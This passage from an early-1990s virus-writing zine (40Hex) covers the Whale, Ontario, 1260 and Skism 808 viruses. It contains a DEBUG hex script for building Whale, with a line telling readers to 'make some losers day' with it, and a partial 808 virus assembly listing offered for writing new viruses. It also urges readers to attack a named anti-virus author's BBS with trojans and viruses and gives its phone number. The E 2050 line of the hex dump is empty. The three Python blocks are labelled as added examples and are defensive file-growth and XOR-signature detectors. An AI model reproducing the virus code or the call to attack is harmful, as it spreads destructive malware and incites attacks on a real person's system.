   SOMETIMES REMOVE IT, ONLY TO RECREATE IT AGAIN AT A LATER TIME.

   tHE NAME OF THIS HIDDEN FILE IS fish-#9.tbl, IT CONTAINS AN

   IMAGE OF THE HARD DISK'S PARTITION TABLE ALONG WITH THE FOLLOWING

   MESSAGE: "fISH vIRUS #9  a wHALE IS NO fISH!  mIND HER mUTANT fISH
             AND THE HIDDEN fISH eGGS  FOR THEY ARE DAMAGING.
             tHE SIXTH fISH MUTATES ONLY IF THE wHALE IS IN  HER cAVE."

     aFTER THE DISCOVERY OF THIS HIDDEN FILE, THE AUTHOR OF THIS

     DOCUMENT MADE SEVERAL ATTEMPTS TO HAVE THE fISH 6 vIRUS MUTATE

     BY INTRODUCING IT AND wHALE INTO A SYSTEM.  uNDER NO CIRCUMSTANCES

     DID A MUTATION OF EITHER VIRUS RESULT, THE RESULTANT FILES WERE

     INFECTED WITH BOTH AN IDENTIFIABLE fISH 6 INFECTION AND A wHALE

     INFECTION.


     wHALE IS HOSTILE TO DEBUGGERS AND CONTAINS MANY TRAPS TO PREVENT

     SUCCESSFUL DECRYPTION OF THE VIRUS.  oNE OF ITS "TRAPS" IS TO LOCK

     OUT THE KEYBOARD IF IT DETERMINES A DEBUGGER IS IN USE.
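
     aN ADDED EXAMPLE, NOT PART OF THE ORIGINAL TEXT: A pYTHON CHECK OVER RAW fat DIRECTORY ENTRIES READ FROM AN OFFLINE DISK IMAGE, WHERE THE RESIDENT VIRUS CANNOT HIDE THE LENGTH CHANGE.  iT FLAGS THE INDICATORS DESCRIBED ABOVE: .com/.exe GROWTH OF 9,216 BYTES AGAINST A KNOWN-CLEAN BASELINE, THE HIDDEN fish-#9.tbl FILE, AND INVALID DATE/TIME FIELDS.  tHE BASELINE SIZES, FILE NAMES AND SAMPLE ENTRIES ARE CONSTRUCTED FOR ILLUSTRATION.

```python
import struct
from typing import Dict, List, NamedTuple

WHALE_GROWTH = 9216            # usual length increase given in the description
DROPPED_FILE = "FISH-#9.TBL"   # hidden root-directory file named in the description
                               # (FAT stores 8.3 names in upper case)
ATTR_HIDDEN, ATTR_VOLUME, ATTR_DIR = 0x02, 0x08, 0x10


class Entry(NamedTuple):
    name: str
    attr: int
    size: int
    stamp_ok: bool


def stamp_is_valid(time_word: int, date_word: int) -> bool:
    """True when the packed DOS time/date words decode to a real timestamp."""
    hour, minute, sec2 = time_word >> 11, (time_word >> 5) & 0x3F, time_word & 0x1F
    month, day = (date_word >> 5) & 0x0F, date_word & 0x1F
    return hour < 24 and minute < 60 and sec2 < 30 and 1 <= month <= 12 and 1 <= day <= 31


def parse_directory(raw: bytes) -> List[Entry]:
    """Decode 32-byte FAT directory entries taken from an offline image."""
    entries = []
    for off in range(0, len(raw) - len(raw) % 32, 32):
        rec = raw[off:off + 32]
        if rec[0] == 0x00:                            # end-of-directory marker
            break
        if rec[0] == 0xE5 or rec[11] & ATTR_VOLUME:   # deleted entry or volume label
            continue
        base = rec[0:8].decode("ascii", "replace").rstrip()
        ext = rec[8:11].decode("ascii", "replace").rstrip()
        time_word, date_word = struct.unpack_from("<HH", rec, 22)
        (size,) = struct.unpack_from("<I", rec, 28)
        name = f"{base}.{ext}" if ext else base
        entries.append(Entry(name, rec[11], size, stamp_is_valid(time_word, date_word)))
    return entries


def triage(raw_dir: bytes, baseline: Dict[str, int]) -> List[str]:
    """Return findings for one directory, given known-clean sizes by file name."""
    findings = []
    for e in parse_directory(raw_dir):
        if e.attr & ATTR_DIR:
            continue
        if e.name == DROPPED_FILE and e.attr & ATTR_HIDDEN:
            findings.append(f"{e.name}: hidden file matching the described drop")
        if not e.stamp_ok:
            findings.append(f"{e.name}: invalid date/time in directory entry")
        if e.name.endswith((".COM", ".EXE")) and e.name in baseline:
            growth = e.size - baseline[e.name]
            if growth == WHALE_GROWTH:
                findings.append(f"{e.name}: grew by exactly {WHALE_GROWTH} bytes")
            elif growth > 0:
                findings.append(f"{e.name}: grew by {growth} bytes (review; mutants differ in length)")
    return findings


def make_entry(name, ext, attr, size, time_word=0x6000, date_word=0x1521):
    """Build one constructed directory entry (defaults: 12:00:00, 1990-09-01)."""
    return struct.pack("<8s3sB10xHHHI", name.ljust(8).encode(), ext.ljust(3).encode(),
                       attr, time_word, date_word, 2, size)


# Constructed sample data: sizes and names are illustrative, not taken from the page.
SAMPLE_BASELINE = {"COMMAND.COM": 25307, "FORMAT.COM": 11616, "SORT.EXE": 1977}
SAMPLE_DIR = b"".join([
    make_entry("COMMAND", "COM", 0x20, 25307 + 9216),             # usual growth
    make_entry("FISH-#9", "TBL", 0x22, 512),                      # hidden + archive
    make_entry("FORMAT", "COM", 0x20, 11616 + 9300),              # different-length growth
    b"\xe5" + make_entry("OLD", "COM", 0x20, 100)[1:],            # deleted entry, skipped
    make_entry("SORT", "EXE", 0x20, 1977, date_word=0x15E1),      # month field = 15
    bytes(32),                                                    # end of directory
])

if __name__ == "__main__":
    for line in triage(SAMPLE_DIR, SAMPLE_BASELINE):
        print(line)
```
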

 

     hERE'S A SIDE NOTE BY THE AUTHOR OF f-pROT



   wHALE

   tHIS IS A RECENT, RATHER REMARKABLE VIRUS.  iT IS LONG, 9216 BYTES AND

   ABLE TO INFECT com AND exe FILES.  tHE INCREASE IN FILE SIZE IS NOT

   VISIBLE THOUGH, WHILE THE VIRUS IS ACTIVE IN MEMORY, AS IT USES SEVERAL

   ADVANCED "STEALTH" METHODS.  oTHER EFFECTS OF THE VIRUS ARE NOT KNOWN,

   BUT ONE INFECTED PROGRAM DISPLAYED THE FOLLOWING MESSAGE WHEN RUN:


                the whale in search of the 8 fish

                i am 'KNZYVO' in hamburg ADDR ERROR d9eb,02


    mOST OF THE VIRUS IS DEVOTED TO ENCRYPTION AND CODE WHICH MOVES BLOCKS OF

    VIRUS CODE AROUND.  tHIS OVERHEAD RESULTS IN A CONSIDERABLE SLOWDOWN OF

    INFECTED SYSTEMS.



    aND HERE IT IS.  uSE YOUR EDITOR TO COPY THE BELOW MACHINE LANGUAGE

    SCRIPT TO A FILE CALLED whale.scr  nEXT USE debug TO MAKE IT INTO A

    com FILE.  uSE THE COMMAND  debug < whale.scr   wHEN IT GETS DONE

    YOU'LL SEE A FILE CALLED whale.com.  tHERE IT IS, HAVE FUN - AND

    MAKE SOME LOSERS DAY!


    ------------------------------------------------------------------------------



    E 1f50  01 04 8c 26 92 fa 89 5c 27 62 5b af bc 9c 56 45

    E 1f60  74 25 be 74 fd 5f 74 89 b9 0a d0 e9 3b f6 2e a6

    E 1f70  35 b3 02 ed e8 cf ee 74 d4 fb c7 cd 22 f9 f1 63

    E 1f80  ef 72 ce d7 56 e4 56 fb c4 3e d9 5b dd df ea 11

    E 1f90  e3 14 d7 7e 43 dd f1 61 ef 74 ce d4 df ce 7a 05

    E 1fa0  ea d7 f4 ec 5c fb c4 e2 c9 4d dd 37 31 fb ed 6a

    E 1fb0  08 e1 55 fc 26 13 e9 08 f8 e8 a1 f8 1a e8 a8 c6

    E 1fc0  d3 1c b9 ec f3 6d 47 f9 e0 63 d3 69 cc f3 45 fe

    E 1fd0  78 ea e3 14 26 5a df d5 53 16 83 dc 0f 76 03 fb

    E 1fe0  61 cd 0e e0 e8 78 f6 6b d7 54 f9 dd 6b c8 5c c4

    E 1ff0  e8 0c f6 a0 d6 ce c5 f5 51 e2 7a a6 3a 1b 69 c4

    E 2000  ed e9 b9 f4 89 f1 9a d6 08 10 3e 89 37 83 d9 0f

    E 2010  72 23 20 ff cd 15 f7 a5 fc 1c d1 cc e8 02 f8 5c

    E 2020  3e 80 da 10 80 0e 97 2f 36 b5 05 b3 1a 88 da 31

    E 2030  88 c9 3e 88 fa ce 8a f2 c2 28 9b e7 0b 19 fc 88

    E 2040  c9 3e b3 18 7c 25 e7 28 6d 3d 87 17 18 17 f2 31

    E 2050

    E 2060  a6 3c 10 22 1e 91 2f 36 3f 0d a9 1a 38 d1 86 0b

    E 2070  5a 84 17 18 10 f4 0e 58 2e f0 33 09 45 cf 4c ff

    E 2080  ce d3 ea 33 23 1e 95 05 83 32 dd d8 3a c7 1e e9

    E 2090  35 56 33 cb 96 f2 cb c0 17 35 73 2f 3d 83 28 a0

    E 20a0  24 27 fa fe c0 fb 83 cc e5 47 31 93 75 2f fa f2

    E 20b0  c0 eb 42 38 14 52 cd fb 89 cc 02 dc 7b a0 c6 fa

    E 20c0  eb 5f a5 d3 dc 7a a0 cb 7a 27 61 fb dd e9 f5 f5

    E 20d0  e8 56 f9 46 ac 71 f2 47 87 b9 6c 17 52 6b 9f 84

    E 20e0  ac e9 8a 6b 9f 86 ac cf 8d b3 17 8c e9 bd 8c b3

    E 20f0  18 a4 ae 99 fa ae 15 50 e6 17 50 0d 9a 8a 81 e9

    E 2100  88 ad 5b 29 af 99 d5 ee 17 48 a2 86 34 52 bf 33

    E 2110  2c 8a 03 5b 64 b9 77 71 e5 ad de f3 83 ef 06 9e

    E 2120  a2 01 76 3d 8e 20 56 24 9f 7f 23 cf 5d 03 ce 01

    E 2130  ea 74 90 ad 63 96 59 81 90 6b ea 74 8d 15 83 9c

    E 2140  4d e6 67 29 96 ac 81 19 9d 88 b4 0f a3 ab a7 17

    E 2150  92 0a bb a9 a7 2d 86 d3 81 78 7f 46 19 a5 7a b4

    E 2160  0f b3 4d a7 ab 28 fe 85 c0 3b d5 90 3a 5a 6f 0d

    E 2170  65 a3 7c 15 5b 71 0b df 1f a3 c7 1f fd 10 4f a4

    E 2180  c0 6b a0 91 d0 bb 20 c0 d9 3d 2d 02 fa e8 95 fa

    E 2190  39 18 23 21 06 9d 2d 36 e8 28 35 09 d6 d5 ce 21

    E 21a0  a8 09 d6 0c c9 b7 06 10 1a a2 10 22 a8 09 b2 1e

    E 21b0  12 1a f0 9a dd f0 32 dd 06 7d 86 18 2d b0 c0 75

    E 21c0  f9 1e 2b 3e 68 2d 21 f0 92 3e 22 d0 f6 ce 60 e9

    E 21d0  38 b3 48 30 50 8e 43 a5 99 a2 03 b3 6e 3e 43 a8

    E 21e0  76 b6 bb 97 10 a2 5b 23 65 5b 4b 64 5b 3a 86 ac

    E 21f0  c3 28 4b e8 6b fa 1a b2 a9 53 b4 d7 b0 b3 83 7c

    E 2200  e4 64 7c 07 65 c4 9c 26 27 96 8a 94 b3 d7 7c ca

    E 2210  87 8f bb 4b 5d 08 ec 2e 13 37 00 ba 3d 8f 20 9d

    E 2220  25 08 b0 60 03 3d 89 38 71 25 08 9a 0e 42 36 26

    E 2230  1d 13 72 24 d0 02 75 9a c1 14 fe 26 1c 1b 73 61

    E 2240  eb 2e 87 73 25 08 98 1e 44 36 2e ad 1d 64 03 3d

    E 2250  ff 10 9d 25 bb d0 89 e3 f7 40 2c d3 74 dc 48 53

    E 2260  9f 37 00 0f d8 2e 16 14 43 c4 e9 e8 26 13 5b a5

    E 2270  d0 14 08 9b 07 af fb c3 af d6 5b 75 aa 24 26 3d

    E 2280  80 11 71 43 c4 ea 89 ce d0 9c 08 9c 06 a8 36 2e

    E 2290  85 73 25 08 9a 1e 44 36 2e af 1d 64 03 35 3b ac

    E 22a0  1c 32 54 f0 53 9e 12 00 25 d2 29 e5 50 40 2c d3

    E 22b0  74 dc 3d 8b 29 21 ed 65 10 0f 08 28 07 54 d4 f8

    E 22c0  dc 3d a1 46 36 2e ad 0d 62 03 3d 8b 28 77 25 08

    E 22d0  ec 36 a8 36 9d e5 46 89 c3 43 81 58 17 00 e6 60

    E 22e0  0c 08 b2 47 02 2a 46 22 65 03 7e 4e cf 08 93 3e

    E 22f0  76 37 01 52 35 8b 60 17 2e 85 3c 24 ad 55 02 08

    E 2300  b0 2d 02 61 0f 7e 4e 2e ad 35 df 02 3d 8e 30 ce

    E 2310  24 cf 6a fe a7 75 06 d9 ed eb e9 3d fe 28 42 24

    E 2320  53 db 81 40 15 ff d8 fb 61 c4 ef 1e c4 f7 40 08

    E 2330  b1 4e 04 3d a2 4f 31 b0 25 fb 7d c4 15 1f af c9

    E 2340  b0 27 fb 27 27 f9 72 c7 fb c4 c7 fb 89 c7 fb 35

    E 2350  c1 4b 5d 75 42 bb ba 30 b9 72 13 2e a6 24 d6 65

    E 2360  f1 f9 7f 48 cf cd 3d 80 28 8f 23 26 67 11 75 42

    E 2370  bb ba 30 b9 72 13 2e a6 24 d6 65 f1 f9 7f 48 e9

    E 2380  2d e8 34 ce ae e7 35 83 78 8a 83 78 d7 83 0c 98

    E 2390  7c 8e 35 a6 78 86 83 78 59 7d 84 e9 af 2e af 25

    E 23a0  75 03 3d 89 18 64 25 08 9f 1e 5d 36 2e aa 15 7d

    E 23b0  03 3d a3 5f 36 2e af 1d 7f 03 3d 89 38 92 25 08

    E 23c0  9a 16 b6 36 c3 ce 12 e8 5f f4 22 2b f6 c3 d4 a0

    E 23d0  7d 0e 30 c9 15 9d 28 25 01 f1 92 1b 0d 87 38 8b

    E 23e0  2e 96 49 d4 59 ef dd f6 97 2b f6 91 d5 3d c3 ce

    E 23f0  42 e7 a0 ad 90 11 b3 3f bd 83 32 9e d0 9b ab 76

    E 2400  30 5b 8b 35 86 ab be b6 96 a0 df 89 cd 81 8b 35

    E 2410  86 a3 be b6 96 a0 df 89 cd 95 83 30 9e d0 9b b6

    E 2420  26 a0 19 88 57 d7 ad e5 70 bc 5f 70 4c 5e 70 24

    E 2430  5e b6 26 a0 19 88 90 16 ab c3 bd 31 90 67 b3 3d

    E 2440  bd 45 46 78 19 ef b6 52 a8 fe 88 30 5b 8b 79 9e

    E 2450  a1 be 67 52 98 5f ab b4 98 ad be 70 f1 5e 70 91

    E 2460  41 21 28 af 23 e2 be 20 af b6 b6 a4 b9 1b 6e bc

    E 2470  7a 55 56 97 ad 71 70 bd 40 1f d0 e8 08 93 0f 33

    E 2480  50 e2 df d8 2e 87 6a 25 08 9d 06 5b 36 2e a8 0d

    E 2490  7b 03 3d 8b 10 66 25 08 98 3e 51 36 2e ad 1d 7f

    E 24a0  03 3d 8b 38 92 25 08 98 16 b6 36 c3 26 42 53 9d

    E 24b0  33 00 9f 96 23 db aa d8 0b 81 37 26 13 83 c3 03

    E 24c0  e2 f7 8b cb 59 8b d9 59 b4 60 eb 1d 56 e8 02 00

    E 24d0  45 69 5a 0e 81 ea a0 23 1f b9 d8 0b 87 d6 81 34

    E 24e0  26 13 83 c6 03 e2 f7 eb 08 80 ec 20 e8 89 01 eb

    E 24f0  db 81 ee 75 ff 80 3c 01 75 02 5e c3 06 1f e9 30

    E 2500  dc 00 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a


    RCX
2402
W
Q


    ------------------------------------------------------------------------------


40hEX vOLUME 1 iSSUE 2
0007


      nOW A WORD FROM A REAL DICK



      wHEN sss TOLD ME HOW MUCH OF A DICK THIS GUY i'M ABOUT TO TELL YOU

      ABOUT IS i DIDN'T BELIEVE HIM.  hIS NAME WILL BE KEPT, BECAUSE IF WE

      MENTION IT HE'LL GET ALL SOUPED AND THINK HE'S PUBLIC ENEMY NUMBER

      ONE IN THE VIRUS COMMUNITY.


      wHO HE IS, IS THE AUTHOR OF A VERY SAD ANTI-VIRUS PROGRAM AND VIRUS

      SCANNER CALLED flu-shot AND vir-x, RESPECTIVELY.  wHAT THE MAN IS,

      IS A SAD CASE WHO WALLOWS IN THE SHADOW OF jOHN mCaFEE AND CURSES

      TO HIS BITTER SELF WHY HE IS NOT A POPULAR ANTI-VIRUS AUTHOR.  tHE

      REASON IS SIMPLE.  hIS PRODUCT SUCKS.  wELL LETS PUT IT THIS WAY,

      HIS SELF PROCLAIMED 'GREAT' SCANNER FAILS TO DETECT OVER 60% OF ALL

      VIRUSES OUT THERE.  oN TOP OF THAT, IT WAS VERY SIMPLE FOR A

      PERSON, WHO SHALL REMAIN NAMELESS, TO INFECT HIS VIRUS SCANNER, AND

      SEND OUT TROJAN COPIES ALL OVER THE usa.  tHE PRODUCT, flu-shot, IS

      THE MOST ANNOYING, FALSE-ALARM CAUSING, PIECE OF TRASH ON THE MARKET.
      nUFF SAID ON THE SUBJECT.



      wHAT MAKES US SO PISSED AT SAID ASSHOLE?  wELL, TAKE INTO MIND THE

      FOLLOWING, FROM THE DOCUMENTATION OF flu-shot.
      ------------------------------------------------------------------------------
       tHE cHALLENGE TO THE wORM

       =========================
       wHEN i FIRST RELEASED A PROGRAM TO TRY TO THWART THEIR DEMENTED 

       LITTLE EFFORTS, i PUBLISHED THIS LETTER IN THE ARCHIVE (STILL IN 

       THE flu_shot+ ARCHIVE OF WHICH THIS IS A PART OF).  wHAT i SAY IN 

       IT STILL HOLDS:


       aS FOR THE DESIGNER OF THE VIRUS PROGRAM: MOST 

       LIKELY AN IMPOTENT ADOLESCENT, INCAPABLE OF 

       NORMAL SOCIAL RELATIONSHIPS, AND ATTEMPTING TO 

       PROVE THEIR OWN WORTH TO THEMSELVES THROUGH 

       THESE TYPE OF TERRORIST ATTACKS.


       nEVER SUCCEEDING IN THAT TASK (OR IN ANY 

       OTHER), SINCE THEY HAVE NO WORTH, THEY WILL ONE 

       DAY TAKE A LOOK AT THEMSELVES AND WHAT THEY'VE 

       DONE IN THEIR PAST, AND KILL THEMSELVES IN 

       DISGUST.  tHIS IS A gOOD tHING, SINCE IT SAVES 

       THE TAXPAYERS' MONEY WHICH NORMALLY WOULD BE 

       WASTED ON THERAPY AND TREATMENT OF THIS MISCREANT.
       iF THEY *REALLY* WANT A CHALLENGE, THEY'LL TRY 

       TO DESTROY *MY* HARD DISK ON MY bbs, INSTEAD OF 

       THE DISK OF SOME INNOCENT PERSON.  i CHALLENGE 

       THEM TO UPLOAD A VIRUS OR OTHER tROJAN HORSE TO 

       MY bbs THAT i CAN'T DISARM.  iT IS DOUBTFUL THE 

       CHALLENGE WILL BE TAKEN: THE PROFILE OF SUCH A 

       PERSON PROHIBITS THEM FROM ATTACKING THOSE WHO 

       CAN FIGHT BACK.  aLAS, HAVING A GO WITH THIS  

       LOWLIFE WOULD BE AMUSING FOR THE FIVE MINUTES 

       IT TAKES TO DISARM WHATEVER THEY INVENT.


       gO AHEAD, YOU GOOD-FOR-NOTHING LITTLE 

       SLIMEBUCKET:  MAKE *MY* DAY!


------------------------------------------------------------------------------


fUNNY ISN'T IT?  wELL mR. dICKBURG, i AM NOT AN ADOLESCENT, NOR AM

i IMPOTENT.  i LEAD QUITE A HEALTHY SOCIAL LIFE, AND HAVE NO SUICIDAL

URGES.  wHAT i AM IS A PERSON WHO (MAYBE BECAUSE OF SOME DEEP DOWN

PSYCHOLOGICAL DISORDER) FINDS JOY IN SEEING SOME GEEKED OUT,

COMPUTER NERD'S SYSTEM GO DOWN THE DRAIN IN A FLASH.


oH YES THERE ARE OTHERS LIKE ME OUT THERE, MANY OTHERS.  iT (VIRUS

WRITING) IS A JOKE.  iT IS DONE FOR A GOOD LAUGH, TO SEE DICKHEADS

LIKE YOU LOSE TIME AND MONEY.  sO MY FRIEND, AT THIS TIME i START

AN ACTIVE CAMPAIGN AFTER YOUR ASS.


aNYONE OUT THERE WHO WANTS TO MAKE SOME DICKS DAY, CALL THIS

ASSHOLES CHEAP bbs AND LETS TAKE HIM DOWN.   tHE NUMBER IS

(212)-889-6438.   tROJANS, aNSI-bOMBS, AND ALL vIRUSES ARE ACEPTED.

gO TO IT!








40hEX vOLUME 1 iSSUE 2
0008


tHE oNTARIO vIRUS




hERE'S A QUICK NICE LITTLE VIRUS FROM OUR BOYZ UP NORTH.

sTATUS:    rARE

dISCOVERED:  jULY, 1990

sYMPTOMS:    .com & .exe GROWTH; DECREASE IN SYSTEM AND FREE MEMORY;

              HARD DISK ERRORS IN THE CASE OF EXTREME INFECTIONS

oRIGIN:      oNTARIO, cANADA

eFF lENGTH:  512 bYTES

tYPE cODE:   prTak - pARASITIC eNCRYPTED rESIDENT .com & .exe iNFECTOR

dETECTION mETHOD:  vIRUsCAN v66+, pRO-sCAN 2.01+, nav

rEMOVAL iNSTRUCTIONS:  scan /d, OR dELETE INFECTED FILES

gENERAL cOMMENTS:

tHE oNTARIO vIRUS WAS ISOLATED BY mIKE sHIELDS IN oNTARIO, cANADA

IN jULY, 1990.  tHE oNTARIO VIRUS IS A MEMORY RESIDENT INFECTOR OF

.com, .exe, AND OVERLAY FILES.  iT WILL INFECT command.com.


tHE FIRST TIME A PROGRAM INFECTED WITH THE oNTARIO vIRUS IS EXECUTED,

IT WILL INSTALL ITSELF MEMORY RESIDENT ABOVE THE TOP OF SYSTEM MEMORY

BUT BELOW THE 640k dos BOUNDARY.  tOTAL SYSTEM MEMORY AND FREE MEMORY

WILL BE DECREASED BY 2,048 BYTES.  aT THIS TIME, THE VIRUS WILL

INFECT command.com ON THE c: DRIVE, INCREASING ITS LENGTH BY 512 BYTES.


eACH TIME AN UNINFECTED PROGRAM IS EXECUTED ON THE SYSTEM WITH THE

VIRUS MEMORY RESIDENT, THE PROGRAM WILL BECOME INFECTED WITH THE VIRAL

CODE LOCATED AT THE END OF THE FILE.  fOR .com FILES, THEY WILL

INCREASE BY 512 BYTES IN ALL CASES.  fOR .exe AND OVERLAY FILES, THE

FILE LENGTH INCREASE WILL BE 512 - 1023 BYTES.  tHE DIFFERENCE IN

LENGTH FOR .exe AND OVERLAY FILES IS BECAUSE THE VIRUS WILL FILL OUT

THE UNUSED SPACE AT THE END OF THE LAST SECTOR OF THE UNINFECTED FILE

WITH RANDOM DATA (USUALLY A PORTION OF THE DIRECTORY) AND THEN APPEND

ITSELF TO THE END OF THE FILE AT THE NEXT SECTOR.  sYSTEMS USING

A SECTOR SIZE OF MORE THAN 512 BYTES MAY NOTICE LARGER FILE INCREASES

FOR INFECTED FILES.  iNFECTED FILES WILL ALWAYS HAVE A FILE LENGTH

THAT IS A MULTIPLE OF THE SECTOR SIZE ON THE DISK.


iN THE CASE OF EXTREME INFECTIONS OF THE oNTARIO vIRUS, HARD DISK

ERRORS MAY BE NOTICED.


oNTARIO USES A COMPLEX ENCRYPTION ROUTINE, AND A SIMPLE IDENTIFICATION

STRING WILL NOT IDENTIFY THIS VIRUS.
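
Since a fixed identification string will not find this virus, the size behaviour described above is the more useful indicator for an integrity checker. The following is an added example, not part of the original article: it compares a baseline of known-good file sizes against current sizes and flags growth that matches the description. The file names, sizes, the 512-byte sector assumption and the overlay extensions (OVL, OVR) are constructed for illustration.

```python
# Added example (not from the original article): flag file-size changes that
# match the growth pattern given in the description above.
# Assumptions: 512-byte sectors, a stored baseline of known-good sizes, and
# overlay files named *.OVL / *.OVR (overlay naming is an assumption).

SECTOR = 512      # sector size assumed by the description
APPENDED = 512    # "eFF lENGTH: 512 bYTES"
PADDED_TYPES = {"exe", "ovl", "ovr"}


def extension(name):
    """Lower-case extension without the dot, or '' if there is none."""
    return name.rsplit(".", 1)[-1].lower() if "." in name else ""


def expected_growth(original_size, ext):
    """Growth the description predicts for a file of this type, else None."""
    ext = ext.lower().lstrip(".")
    if ext == "com":
        return APPENDED                      # .com: 512 bytes in all cases
    if ext in PADDED_TYPES:
        # Last sector is filled out, then 512 bytes follow at the next sector,
        # which gives the 512..1023 byte range quoted in the description.
        padding = -original_size % SECTOR
        return padding + APPENDED
    return None                              # type not covered by the description


def matches_description(name, baseline_size, current_size):
    """True if the size change is exactly what the description predicts."""
    ext = extension(name)
    predicted = expected_growth(baseline_size, ext)
    if predicted is None or current_size - baseline_size != predicted:
        return False
    # For padded types the result must also end on a sector boundary.
    return ext == "com" or current_size % SECTOR == 0


def triage(baseline, current):
    """Names present in both maps whose growth matches, sorted for reporting."""
    return sorted(
        name for name, size in current.items()
        if name in baseline and matches_description(name, baseline[name], size)
    )


# Constructed sample data: three files grown per the description, one file
# that grew for an unrelated reason, one unchanged file.
BASELINE = {"COMMAND.COM": 25307, "EDIT.EXE": 10001, "CALC.EXE": 4096,
            "TOOL.EXE": 3000, "README.TXT": 900}
CURRENT = {"COMMAND.COM": 25819, "EDIT.EXE": 10752, "CALC.EXE": 4608,
           "TOOL.EXE": 3600, "README.TXT": 900}

if __name__ == "__main__":
    for name in triage(BASELINE, CURRENT):
        print(f"{name}: growth matches the described pattern, inspect further")
```

A match is a reason to inspect the file, not a verdict: any update that happens to add the same number of bytes will also be flagged.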



------------------------------------------------------------------------------




------------------------------------------------------------------------------




40hEX vOLUME 1 iSSUE 2
0009


  tHE 1260 vIRUS


  hERE'S A NICE LITTLE ENCRYPTING VIRUS WRITTEN IN aMERICA.


  aLIASES:     v2p1

  v sTATUS:    rESEARCH

  dISCOVERY:   jANUARY, 1990

  sYMPTOMS:    .com FILE GROWTH

  oRIGIN:      mINNESOTA, usa

  eFF lENGTH:  1,260 bYTES

  tYPE cODE:   pnc - pARASITIC eNCRYPTING nON-rESIDENT .com iNFECTOR

  dETECTION mETHOD:  vIRUsCAN v57+, ibm sCAN, pRO-sCAN 1.4+, f-pROT 1.12+,

                avtk 3.5+, vIRhUNT 2.0+, nav

 rEMOVAL iNSTRUCTIONS: cLEANuP v57+, pRO-sCAN 1.4+, f-pROT 1.12+, vIRhUNT 2.0+

 gENERAL cOMMENTS:
 tHE 1260 VIRUS WAS FIRST ISOLATED IN jANUARY, 1990.  tHIS

         VIRUS DOES NOT INSTALL ITSELF RESIDENT IN MEMORY, BUT IT IS

         EXTREMELY VIRULENT AT INFECTING .com FILES.  iNFECTED FILES

         WILL HAVE THEIR LENGTH INCREASED BY 1,260 BYTES, AND THE

         RESULTING FILE WILL BE ENCRYPTED.  tHE ENCRYPTION KEY CHANGES

         WITH EACH INFECTION WHICH OCCURS.


         tHE 1260 VIRUS IS DERIVED FROM THE ORIGINAL vIENNA vIRUS, THOUGH

         IT IS HIGHLY MODIFIED.


         tHIS VIRUS WAS DEVELOPED AS A RESEARCH VIRUS BY mARK wASHBURN, WHO

         WISHED TO SHOW THE ANTI-VIRAL COMMUNITY WHY IDENTIFICATION STRING

         SCANNERS DO NOT WORK IN ALL CASES.  tHE ENCRYPTION USED IN 1260 IS

         ONE OF MANY POSSIBLE CASES OF THE ENCRYPTION WHICH MAY OCCUR WITH

         wASHBURN'S LATER RESEARCH VIRUS, v2p2.
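
The point about identification-string scanners can be seen from the scanner's side in the simplest case, a body XORed with a single byte that changes per infection (the kind of loop the 808 listing in this issue uses). The following is an added example, not part of the original article and not 1260's own scheme: it shows a fixed string missing every re-keyed copy while a key-independent "X-ray" comparison of adjacent-byte differences still matches. The body is a constructed, harmless text string standing in for encrypted content.

```python
# Added example (not from the original article): why a fixed identification
# string fails against a body that is re-keyed on every copy, and how a
# key-independent comparison still finds it. Simplified to single-byte XOR;
# the body below is constructed, harmless text.

BODY = b"CONSTRUCTED-SAMPLE-BODY: not real virus code"
SIGNATURE = BODY[5:21]          # 16-byte identification string from the plain body


def xor_encrypt(body, key):
    """Single-byte XOR over the whole body (key 0 leaves it unchanged)."""
    return bytes(b ^ key for b in body)


def build_sample(key):
    """Constructed 'file': filler bytes, then the XORed body, then filler."""
    return b"\x90" * 16 + xor_encrypt(BODY, key) + b"\x00" * 8


def string_scan(data, signature=SIGNATURE):
    """Classic identification-string scan: literal byte search."""
    return signature in data


def xray(data):
    """XOR of each adjacent byte pair.

    (a ^ k) ^ (b ^ k) == a ^ b, so a single-byte XOR key cancels out and the
    result is the same for every key.
    """
    return bytes(a ^ b for a, b in zip(data, data[1:]))


def xray_scan(data, signature=SIGNATURE):
    """Search for the signature's difference pattern instead of its bytes."""
    return xray(signature) in xray(data)


def detection_counts(keys=range(100)):
    """(string_scan hits, xray_scan hits) over one sample per key."""
    samples = [build_sample(k) for k in keys]
    return (sum(string_scan(s) for s in samples),
            sum(xray_scan(s) for s in samples))


CLEAN_FILE = bytes(range(256))  # constructed clean input for a negative check

if __name__ == "__main__":
    plain_hits, xray_hits = detection_counts()
    print(f"string scan: {plain_hits}/100 samples detected")
    print(f"x-ray scan:  {xray_hits}/100 samples detected")
    print("clean file flagged:", xray_scan(CLEAN_FILE))
```

The same cancellation does not hold once the key changes from byte to byte or the decryptor itself varies, which is why scanners for such code fall back on other methods.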



         -----------------------------------------------------------------


----------------------------------------------------------------------------

40hEX vOLUME 1 iSSUE 2
0010


             tHE 808 vIR


             hERE'S ANOTHER VIRUS FROM sKISM.  iT'S A QUICK OVERWRITING VIRUS BUT

             YOU CAN USE THE SOURCE CODE TO WRITE YOUR OWN VIRUSES.


------------------------------------------------------------------------------


;tHE sKISM 808 vIRUS.  cREATED 1991 BY sMART kIDS iNTO sICK mETHODS.




FILENAME   equ      30       ;USED TO FIND FILE NAME

FILEATTR   equ      21                 ;USED TO FIND FILE ATTRIBUTES

FILEDATE   equ      24                 ;USED TO FIND FILE DATE

FILETIME   equ      22                 ;USED TO FIND FILE TIME




CODE_START equ      0100H              ;START OF ALL .com FILES

VIRUS_SIZE equ      808                ;tr 808



CODE     SEGMENT  'CODE'
ASSUME   CS:CODE,DS:CODE,ES:CODE

ORG      CODE_START


MAIN PROC   NEAR


JMP    VIRUS_START


ENCRYPT_VAL    DB  00H


VIRUS_START:

     CALL     ENCRYPT                  ;ENCRYPT/DECRYPT FILE

                   JMP      VIRUS                    ;GO TO START OF CODE


ENCRYPT:
                   PUSH     CX
                   MOV      BX,OFFSET VIRUS_CODE     ;START ENCRYPTION AT DATA
     XOR_LOOP:     MOV      CH,[BX]                  ;READ CURRENT BYTE

                   XOR      CH,ENCRYPT_VAL           ;GET ENCRYPTION KEY

                   MOV      [BX],CH                  ;SWITCH BYTES

                   INC      BX                       ;MOVE BX UP A BYTE

                   CMP      BX,OFFSET VIRUS_CODE+VIRUS_SIZE

                                              ;ARE WE DONE WITH THE ENCRYPTION
                   JLE      XOR_LOOP                 ;NO?  KEEP GOING

                   POP      CX
                   RET
INFECTFILE:
                   MOV     DX,CODE_START         ;WHERE VIRUS STARTS IN MEMORY

